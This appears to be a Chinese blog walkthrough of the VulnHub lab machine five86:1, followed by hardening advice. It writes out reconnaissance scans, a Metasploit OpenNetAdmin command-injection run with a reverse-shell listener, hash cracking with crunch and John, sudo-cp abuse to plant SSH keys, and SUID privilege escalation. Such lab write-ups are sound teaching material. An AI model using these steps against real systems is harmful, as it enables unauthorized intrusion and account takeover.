当前位置: 首页 > news >正文

five86: 1靶场渗透测试

five86: 1

来自 <five86: 1 ~ VulnHub>

 

1,将两台虚拟机网络连接都改为NAT模式

2,攻击机上做namp局域网扫描发现靶机

nmap -sn 192.168.23.0/24

那么攻击机IP为192.168.23.128,靶场IP192.168.23.137

3,对靶机进行端口服务探测

nmap -sV -T4 -p- -A 192.168.23.137

扫描结果显示 3 个开放 TCP 端口

1 SSH(22/tcp)

  • 服务:OpenSSH 7.9p1(Debian 10)
  • 协议:SSH-2.0
  • Hostkey 指纹已列出:
    • RSA 2048
    • ECDSA 256
    • ED25519 256

潜在安全分析:

  • OpenSSH 7.9 属于较旧版本(2018 年左右),可能存在一些已知漏洞,如:
    • 用户枚举
    • 弱加密算法可被破解
  • 可以进行:
    • 弱口令尝试(Password guessing)
    • 公钥配置分析

2 HTTP(80/tcp)

  • 服务:Apache 2.4.38 (Debian)
  • HTTP Header 与信息:
    • Server: Apache/2.4.38 (Debian)
    • _http-title: Site doesn't have a title (text/html)
  • Robots.txt:
    • 发现路径 /ona 被禁止爬虫访问(可能存在敏感信息或后台接口)

潜在攻击面:

  • Apache 2.4.38 已知漏洞:
    • CVE-2019-0211(权限提升)
    • CVE-2019-0220(DoS)
  • /ona 路径可能是管理后台或接口,需要手动访问或枚举。
  • 可进一步扫描:
    • CMS 指纹识别
    • Web 漏洞扫描(SQLi、XSS、文件上传)

3 Webmin(10000/tcp)

  • 服务:MiniServ 1.920(Webmin)
  • Web 界面标题为空
  • Webmin 默认管理端口为 10000
  • 潜在风险:
    • Webmin 1.920 是 2019 年版本,存在多个已知漏洞:
      • CVE-2019-15107:远程命令执行(如果未打补丁)
    • 默认凭证风险(admin/admin 或弱密码)

 

4,访问80端口开放的http服务

空白页面,扫描其是否存在子目录

dirsearch -u http://192.168.23.137/ -x 403,404

http://192.168.23.137/robots.txt

http://192.168.23.137/ona/

扫描识别一下网页的指纹信息

whatweb -v http://192.168.23.137/ona/

OpenNetAdmin (ONA) 是一款基于 Web 的 IP 地址管理(IPAM)和网络管理工具,主要用于组织和管理局域网(LAN)中的 IP 地址、子网和网络设备信息。

  • 官方网站:https://www.opennetadmin.com/
  • 开源免费,通常部署在 LAMP 环境(Linux + Apache + MySQL/MariaDB + PHP)
  • 特别适合中小型企业、学校或实验室网络管理

ONA 的主要目的是 让网络管理员方便地追踪 IP 地址使用情况,管理设备、子网和 VLAN 信息

5,再扫描一下二级子目录

dirsearch -u http://192.168.23.137/ona -x 403,404

存在login登录界面

http://192.168.23.137/ona/login.php

怀疑存在弱口令,尝试爆破一下

爆破很复杂,其实账户密码都是admin,可以直接登录

6,检索一下OpenNetAdmin是否具有公开漏洞利用信息

当前版本具有命令执行漏洞,使用metaslpoit进行攻击,先搜索这个漏洞的相关攻击模块

msfconsole

search  OpenNetAdmin

use 0 或者 use exploit/unix/webapp/opennetadmin_ping_cmd_injection

options

set LHOST 192.168.23.128

set RHOSTS 192.168.23.137

run

成功getshell

 

7,再创建可交互shell

python -c 'import pty;pty.spawn("/bin/bash")'

然后进行基础的信息收集

存在5个用户,尝试进行横向移动。得到一个过于账户密码的提示:douglas的密码是十位,且包含aefhrt这些字符

8,根据提示crunch生成密码字典。

crunch 10 10 aefhrt -o passwd.txt

$apr1$9fgG/hiM$BtsL9qpNHUlylaLxk81qY1 写入文本保存文件名保存为hash

echo '$apr1$9fgG/hiM$BtsL9qpNHUlylaLxk81qY1' > hash

john --wordlist=passwd.txt  hash

成功切换用户

9,然后再查sudo/suid可提权的操作

可以无需密码通过sudo以jen用户权限执行cp命令。结合douglas家目录下的.ssh,将id_rsa.pub复制到/jen/.ssh目录下就能通过密钥登录了。

cp /home/douglas/.ssh/id_rsa.pub /tmp/authorized_keys

chmod 777 /tmp/authorized_keys

sudo -u jen /bin/cp /tmp/authorized_keys /home/jen/.ssh

相当于在douglas用户上完成了写公钥攻击,然后就能够ssh横向移动登录到jen

ssh jen@127.0.0.1

 

10,登录到jen用户时提示有邮件,在邮件中找到moss密码Fire!Fire!

再横向移动到moss

 

11,查看一下能够帮助suid提权的可执行文件

find / -perm -u=s 2>/dev/null

尝试执行一下这个文件

cd /home/moss/.games/

./upyourgame

结果就莫名其妙提权了,然后得到了flag

渗透链总结(攻击路径)

  1. 信息收集 → 确定 ONA 存在
    • 通过 nmap 扫描发现 80 端口服务,并在 /robots.txt 中发现 /ona 目录。
    • 使用 whatweb 识别出 OpenNetAdmin (ONA),确认其为潜在攻击入口。
  2. 弱口令 + ONA RCE → 初始 Web shell
    • 登录页面使用默认弱口令 admin/admin 成功进入系统。
    • ONA 存在已知命令注入漏洞(ping_cmd_injection),通过 Metasploit 成功获得反弹 shell。
  3. 用户提示 + 密码破解 → 获取 douglas 权限
    • 在系统信息中发现用户 douglas 的密码特征提示:10 位,由 aefhrt 字符组成。
    • 使用 crunch 生成字典,结合 john 破解 hash,成功切换到 douglas 用户。
  4. sudo 滥用 (cp) → 横向移动到 jen
    • douglas 用户被允许通过 sudo 以 jen 身份执行 /bin/cp。
    • 将公钥写入 jen 的 .ssh/authorized_keys 文件,成功切换到 jen 用户。
  5. 邮件信息泄露 → 获取 moss 密码
    • 登录 jen 用户时发现新邮件,阅读 /var/mail/jen 后得到 moss 用户的密码(Fire!Fire!)。
    • 使用凭据切换到 moss 用户。
  6. SUID 程序利用 → 获得 root
    • 使用 find / -perm -u=s 发现可疑的 SUID 程序 /home/moss/.games/upyourgame。
    • 执行该程序后直接提权至 root,成功获取最终 Flag。

攻防要点(安全建议)

  1. Web 应用防护
    • OpenNetAdmin 存在远程命令执行漏洞,应及时更新或更换安全版本。
    • 部署 Web 应用时应定期进行漏洞扫描,避免使用长期未维护的软件。
  2. 弱口令问题
    • 系统和应用均存在默认弱口令(admin/admin),这是重大安全风险。
    • 建议强制修改默认密码,启用复杂密码策略,并加入暴力破解防护(如 Fail2ban、账户锁定)。
  3. 信息泄露风险
    • 系统邮件中存储明文密码,导致凭证被轻易获取。
    • 应避免通过邮件或日志记录敏感凭证,必要时应加密存储或使用一次性链接。
  4. 最小权限原则
    • douglas 用户被授予 sudo 执行 cp 的权限,攻击者可借此横向移动。
    • 建议严格限制 sudo 配置,采用最小权限原则,仅允许必要的管理命令。
  5. SUID 程序审计
    • 非系统关键程序 /home/moss/.games/upyourgame 被设置为 SUID,直接导致本地提权。
    • 建议定期审计系统中的 SUID 文件,移除不必要的高权限可执行文件,防止被攻击者利用。
  6. 综合防御措施
    • 增加入侵检测与日志审查,及早发现异常行为(如字典爆破、大量目录扫描)。
    • 采用多层防护(网络层 + 主机层 + 应用层),避免单点失守导致整机沦陷。
    • 加强内部安全培训,提醒运维人员避免明文密码和不必要的权限配置。
http://www.dtcms.com/a/357631.html

相关文章:

  • 大模型应用开发笔记(了解篇)
  • Pytorch超分辨率模型实现与详细解释
  • Linux内核进程管理子系统有什么第三十八回 —— 进程主结构详解(34)
  • 叠叠问题解决
  • iPaaS实施的前提是先进行集成关系的梳理
  • 从自定义日期类角度解析运算符重载,友元函数(friend)
  • AI助力PPT创作:秒出PPT与豆包AI谁更高效?
  • 实现动态数组
  • 【NJU-OS-JYY笔记】操作系统:设计与实现
  • 【开题答辩全过程】以 基于Vue Spring Boot的教师资格证考试助力系统设计与实现为例,包含答辩的问题和答案
  • 黑客之都CSP-J模拟赛题解
  • C6.6:交流参量、电压增益、电流增益的学习
  • 企业级-搭建CICD(持续集成持续交付)实验手册
  • 【面试场景题】三阶段事务提交比两阶段事务提交的优势是什么
  • TypeScript: Symbol.iterator属性
  • 蓝蜂蓝牙模组:破解仪器仪表开发困境
  • 打通安卓、苹果后,小米澎湃OS 3又盯上了Windows
  • 【系列05】端侧AI:构建与部署高效的本地化AI模型 第4章:模型量化(Quantization)
  • AntSK知识库多格式导入技术深度解析:从文档到智能,一站式知识管理的技术奇迹
  • 第十二节 Spring 注入集合
  • 零知识证明的刑事证据困境:隐私权与侦查权的数字博弈
  • Windows 11 跳过 OOBE 的方法和步骤
  • 企业级数据库管理实战(二):数据库权限最小化原则的落地方法
  • 现状摸底:如何快速诊断企业的“数字化健康度”?
  • 嵌入式Linux驱动开发 - 蜂鸣器驱动
  • 25.8.29_NSSCTF——[BJDCTF 2020]Easy_WP
  • VeOmni 全模态训练框架技术详解
  • 深入理解Go 与 PHP 在参数传递上的核心区别
  • 变量声明方式
  • 嵌入式第四十一天(数据库)